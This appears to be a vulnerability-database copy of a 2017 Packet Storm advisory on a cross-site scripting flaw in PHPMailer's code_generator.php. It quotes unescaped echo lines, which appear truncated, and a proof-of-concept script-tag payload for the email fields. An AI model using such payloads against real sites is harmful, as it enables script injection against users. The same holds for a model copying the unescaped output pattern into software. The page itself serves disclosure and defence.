Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormShahab ShamsiPACKETSTORM:143138
HistoryJun 25, 2017 - 12:00 a.m.

PHPMailer Cross Site Scripting

2017-06-2500:00:00
Shahab Shamsi
packetstormsecurity.com
25
JSON
`[-] Title : PHPMailer < 5.2.23 - Cross-Site Scripting  
[-] Author : Shahab Shamsi  
[-] Software Link : https://github.com/PHPMailer/PHPMailer  
[-] Version: [ 5.2.23 ]  
[-] Tested on : [ Kali , Windows ]  
[-] Category : Webapps  
[-] Date : 2017-06-22  
  
  
Vulnerable page :  
/code_generator.php  
  
  
Vulnerable Source :  
312: echo $from_name;  
18: $from_name = $_POST['From_Name'] : '';  
  
313: echo $from_email;  
19: $from_email = $_POST['From_Email'] : '';  
  
314: echo $to_name;  
20: $to_name = $_POST['To_Name'] : '';  
  
315: echo $to_email;  
21: $to_email = $_POST['To_Email'] : '';  
  
  
  
  
POC :  
http://localhost/code_generator.php  
  
step 1 = Go To Web Page = http://localhost/code_generator.php  
  
Step 2 = In the box : "From Email Address" AND "To Email Address"  
  
Step 3 = input box , Add JavaScript Code : <script>alert('XSS')</script>  
  
  
  
************************  
* ==> Contact Me :  
* Telegram : @Shahab_Shamsi  
* Email : [email protected]  
* WebSilte : WwW.iran123.Org  
************************  
`
JSON